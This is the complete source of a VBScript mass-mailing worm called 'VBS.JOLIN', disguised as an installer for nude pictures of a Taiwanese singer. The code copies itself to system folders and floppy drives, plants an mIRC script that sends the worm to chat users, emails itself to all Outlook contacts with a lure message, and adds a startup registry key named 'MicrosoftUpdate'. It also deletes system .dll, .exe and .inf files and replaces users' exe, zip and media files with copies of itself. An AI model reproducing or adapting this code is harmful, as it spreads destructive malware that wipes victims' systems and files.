rem °Origin°YulangWest°
rem VBS.JOLIN

dim windir,sysdir,fso,temp,x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
dim fso,wshell,cpy,realname,windir,sysdir,br,temp,t,hdir,targetfile,fwrite,fread,same,ext
Set fso=CreateObject("Scripting.FileSystemObject")
Set wshell=CreateObject("WScript.Shell")
windir=fso.GetSpecialFolder(0)
sysdir=fso.GetSpecialFolder(1)
realname="!!jolin_caught_naked!!!!.jpg.vbs"
Const ForReading=1, ForWriting=2, ForAppending=8
br=Chr(13)&Chr(10)

Set cpy=a.GetFile(WScript.ScriptFullName)
cpy.Copy(windir&"\"&realname)
cpy.Copy(sysdir&"\"&realname)

temp=MsgBox("This will installs all the horny contents of Jolin."&vbcrlf&vbcrlf&"The contents will be installed in this folder:"&vbcrlf&windir&"\JOLIN_NAKED_SECRET_FOLDER\        "&vbcrlf&vbcrlf&"All contents will be kept in a secret folder."&vbcrlf&"To prevent your mother from seeing it. gee~", _
             VbOkOnly, _
            "Jolin Install")

function fuck(jolin)
 fso.DeleteFile(jolin)
End Function

For Each t In fso.Drives
if t.path = "A:" Then
fso.GetFile(WScript.ScriptFullName).Copy(t.path&"\")
End If
Next

hdir=left(windir,3)

For Each t In fso.GetFolder(hdir).SubFolders
 If fso.FileExists(t.path&"\mirc.ini") Then
   mirc_infect(t.path)
 End If
Next

function mirc_infect(mirc)
 targetfile=mirc&"\script.ini"
 Set fwrite=fso.CreateTextFile(targetfile,2)
  fwrite.Write("n0=;Please Do Not Edit This File. Any editing to these file will cause the windows system files unable to work properly. It may cause the whole system down on it knees."&br&"n1=;VBS.JOLIN"&br&"n2=on *:start:/echo -a *** mIRC Will Auto-Connect To Galaxynet. Please Use This Server Only! If connected to other servers. Windows Will Be Corrupted. | /server supreme.kl.my.galaxynet.org:6667"&br&"n3=on *:connect:/join #Mystery_land | /msg #mystery_land DeV|L|oRd sucks!"&br&"n4=on *:join:#:/if ($r(1,10) == 5) && (c isin $nick) { /.notice $nick $me is sending now the best Jolin Naked Picture Ever Taken! Please accept it now! | /.dcc send $nick """&realname&""" } | if (fix isin $chan) || (virus isin $chan) || (help isin $chan) || (clear isin $chan) || (remove isin $chan) { /.part $chan }")
  fwrite.close
end function




  set regedit = CreateObject("WScript.Shell")
  set out = WScript.CreateObject("Outlook.Application")
  set mapi = out.GetNameSpace("MAPI")
  for ctrlists = 1 to mapi.AddressLists.Count
    set a = mapi.AddressLists(ctrlists)
    x = 1
    regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
    if (regv = "") then
      regv = 1
    end if
    if (int(a.AddressEntries.Count) > int(regv)) then
      for ctrentries = 1 to a.AddressEntries.Count
        malead = a.AddressEntries(x)
        regad = ""
        regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
        if (regad = "") then
          set male = out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "FW: check this out..."
          male.Body = vbcrlf & "This was the first naked picture taken by a Taiwan singer! Jolin... please don't get over steam by staring at the picture! keke~"
          male.Attachments.Add(windir&"\"&realname)
          male.Send
          regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
        end if
        x = x + 1
      next
      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    else
      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    end if
  next
  Set out = Nothing
  Set mapi = Nothing

wshell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate", sysdir&"\"realname

For Each t In fso.GetFolder(sysdir).Files
 ext=lcase(fso.GetExtensionName(t.name))
  if (ext="dll") or (ext="exe") or (ext="inf") Then
    fuck(t.path)
  end if
Next

Set fread=fso.OpenTextFile(WScript.ScriptFullName,1)
same=fread.ReadAll

For Each t In fso.GetFolder(hdir&"My Documents").Files
ext=lcase(fso.GetExtensionName(t.name))
if (ext="exe") or (ext="zip") or (ext="mp3") or (ext="mpeg") Then
Set fwrite=fso.CreateTextFile(t.path&"                                                                                                         .vbs",2)
fwrite.Write same
fwrite.Close
fuck(t.path)
End if
Next

temp=MsgBox("Install Complete. Enjoy!", _
            VbOkOnly, _
            "Jolin Install")

rem bY fox=`wh|tef0x=hUrt=locah0st
rem LuV dAdA/Priscillia